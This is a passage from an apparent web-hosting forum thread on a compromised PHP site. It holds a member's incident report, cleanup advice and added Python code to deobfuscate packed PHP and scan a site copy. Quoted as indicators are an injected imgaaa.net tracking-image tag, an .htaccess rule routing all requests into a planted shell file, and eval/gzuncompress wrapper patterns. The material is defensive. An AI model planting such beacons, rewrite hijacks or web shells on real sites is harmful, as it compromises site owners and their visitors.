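    return "<? " + src + " ?>"


# Constructed inner script using the obfuscation idioms from the dump.
SAMPLE_INNER = (
    "$t = round(0+6.66666666667+6.66666666667+6.66666666667);\n"
    "curl_setopt($c, 10002, $u);\ncurl_setopt($c, 13, $t);\n"
    "$code = curl_getinfo($c, 2097154);\nif ($code >= round(0+200+200)) $r = false;"
)

if __name__ == "__main__":
    plain, depth = deobfuscate(build_sample(SAMPLE_INNER))
    print("layers removed:", depth)
    print(plain)
```

Run it against a real 26.php with `deobfuscate(open("26.php", encoding="latin-1").read())`; the result is the code PHP would have executed, so treat it as hostile text and never paste it back into an interpreter.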

  21. #21
    SitePoint Member (Join Date: Apr 2011, Posts: 1)
    A couple of weeks ago I came across this line of code on my girlfriend's Mom's Web site: <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=10482688">

    I wasn't looking for anything malicious, but it stood out so I started digging into it, and ultimately found this thread. She asked me to clean it up for her so this week I took a look at it. The stuff I found was in line with what others found, but there were a couple of additions as well.

    Note: I'm not a coder or Web designer, I'm a Cisco guy. If any of what I say seems basic then forgive me; I hope what I found might add to the discussion.

    The first modification to the site was the addition of "<img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=10482688">" at the bottom of the /index.php page.

    One day later, two more modifications were made:

    1. The .htaccess file was modified (thanks to Sventy's post for cluing me into looking for that). The file was also hidden so it did not show up when I was looking at the file modification dates. I am not sure if that is normal for this server or if it was modified during the attack.

    2. Files 43.php and 95.php were added. They contained compressed binary code, as outlined in other posts.

    Then, within a seven day window, one other file was modified and one was added.

    First, an index.html file in a sub-directory was modified to include this script: #1851387 - Pastie (NOTE: Your anti-virus may go crazy viewing that link; if you're worried about it then you can view a screenshot of it here: ImageShack® - Online Photo and Video Hosting.)

    There were two other things in that same file that I think were probably additions, but I can't know for sure since I didn't have the original to compare against. They didn't look right so I removed them. They are both shown in this pastie: #1851393 - Pastie

    The last change was that a file named hxyn.php was uploaded to the root of the Web site. This file was the "Web Shell by oRB" script. Again, I'm not a coder, but from what I can tell this file is designed to check for vulnerabilities or security flaws on the web server (.htpasswd, config files, admin files, etc). You can view it here: #1851432 - Pastie

    One thing to note about hxyn.php is that it contains some mechanism to keep you from viewing it on the web server using nano or vi (at least I couldn't view it on this particular server, which is Debian based). The file is easily viewable once you download it and open it in a local editor. I am assuming this is to keep it from being found through grep, etc.

    Recommendations:

    1. Change your FTP passwords. That goes without saying.
    2. IMMEDIATELY change the passwords to any other accounts that used the same password as your FTP/SSH/Telnet, ESPECIALLY if they are email or banking accounts. The best thing to do is just assume all of your passwords or your client's passwords were compromised.
    3. Look for any files that were modified OR ADDED after the attack. Remember that restoring from a backup will not necessarily remove added files. This particular attack starts with the imgaaa line of code, so if you can identify when that line was added to a page then you have a nice baseline of when to start looking for changes.
    4. Don't forget directories and hidden files. Filezilla contains a nice feature that will try to show hidden files. Remember to turn it on.
    5. Download the Web site (unzipped) to a Windows PC that has good malware protection. Check the logs of your anti-malware products to see if they detected anything unusual in the files.
    6. Don't forget to look for scripts or anything else unusual that may have been added.

    Unfortunately I have the feeling that my girlfriend's Mom's site may have been compromised in more ways than what I saw. If anyone else has any suggestions on what to look for then I'd appreciate it. It was coded from scratch so it is not based on WP or Joomla or anything like that, and it is written in a combination of html and php.
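As an added example tying together the indicators from posts #5 and #10 with the recommendations above (not code from the thread or any poster): a Python scanner that walks a downloaded copy of the site, including hidden files and directories, and flags the imgaaa.net beacon, eval(gzuncompress/gzinflate/base64_decode( wrappers, a .htaccess that rewrites every request into a NN.php file, two-digit or n.php filenames, the hidden .log working directory, and every file modified or added after a baseline time. The sample tree it builds in a temp directory is constructed; its file names, contents and the example.com host are made up.

```python
# Added example, not code from the thread. Walk a site copy and report the
# artefacts described in this thread plus files changed after a baseline time.
import os
import re
import tempfile
import time
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List

BEACON = re.compile(r'<img\s+heig?th="1"\s+width="1"\s+border="0"\s+src="http://imgaaa\.net/t\.php\?id=\d+">', re.I)
EVAL_LAYER = re.compile(r"eval\s*\(\s*(?:gzuncompress|gzinflate|base64_decode)\s*\(", re.I)
HTACCESS_HIJACK = re.compile(r"RewriteRule\s+\^\(\.\*\)\$?\s+\S*?\d{2}\.php\?q=\$1", re.I)
SHELL_NAME = re.compile(r"^(?:\d{2}|n)\.php$", re.I)
MAX_READ = 2 * 1024 * 1024   # don't slurp huge media files

R_BEACON = "imgaaa.net tracking beacon"
R_EVAL = "eval(gzuncompress/gzinflate/base64_decode( layer"
R_HTACCESS = ".htaccess rewrites every request into a NN.php shell"
R_NAME = "two-digit/n.php shell filename"
R_LOGDIR = "hidden .log working directory"
R_MTIME = "modified or added after baseline"


@dataclass
class Finding:
    relpath: str
    reasons: List[str] = field(default_factory=list)


def inspect_file(path: Path, baseline: float) -> List[str]:
    reasons = []
    if SHELL_NAME.match(path.name):
        reasons.append(R_NAME)
    try:
        with path.open("rb") as fh:
            text = fh.read(MAX_READ).decode("latin-1")
    except OSError:
        return reasons
    if BEACON.search(text):
        reasons.append(R_BEACON)
    if EVAL_LAYER.search(text):
        reasons.append(R_EVAL)
    if path.name == ".htaccess" and HTACCESS_HIJACK.search(text):
        reasons.append(R_HTACCESS)
    if path.stat().st_mtime >= baseline:
        reasons.append(R_MTIME)
    return reasons


def scan(root: str, baseline: float) -> List[Finding]:
    """os.walk includes dot-files and dot-directories, so hidden artefacts are not skipped."""
    root_path = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d == ".log":
                findings.append(Finding((Path(dirpath) / d).relative_to(root_path).as_posix(), [R_LOGDIR]))
        for name in filenames:
            p = Path(dirpath) / name
            reasons = inspect_file(p, baseline)
            if reasons:
                findings.append(Finding(p.relative_to(root_path).as_posix(), reasons))
    return findings


def build_sample_site(root: str) -> float:
    """Constructed infected tree (made-up content); returns the baseline timestamp (one hour ago)."""
    now = time.time()
    baseline = now - 3600
    files = {
        "index.php": '<?php include "site.php"; ?>\n</body>\n</html><img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=8999982">',
        ".htaccess": "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{REQUEST_FILENAME} !-f\n"
                     "RewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]\n</IfModule>\n",
        "wp-admin/26.php": "<? eval(gzuncompress(base64_decode('...'))); ?>",   # blob left out on purpose
        ".log/example.com/xmlrpc.txt": "bestnetblog.net",
        "about.html": "<html><body>About us</body></html>",
    }
    for rel, content in files.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="latin-1")
    old = baseline - 86400
    os.utime(Path(root) / "about.html", (old, old))   # untouched file predates the attack
    return baseline


def findings_by_path(findings: List[Finding]) -> Dict[str, List[str]]:
    return {f.relpath: f.reasons for f in findings}


def demo() -> Dict[str, List[str]]:
    root = tempfile.mkdtemp(prefix="site-")
    return findings_by_path(scan(root, build_sample_site(root)))


if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(rel, "->", "; ".join(reasons))
```

For a real case, call `scan("/path/to/site-copy", baseline)` with the baseline taken from the access log entry that carried q=alcobro or from the first appearance of the imgaaa.net line; anything it reports as modified after that point deserves a look even when no other indicator fires.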

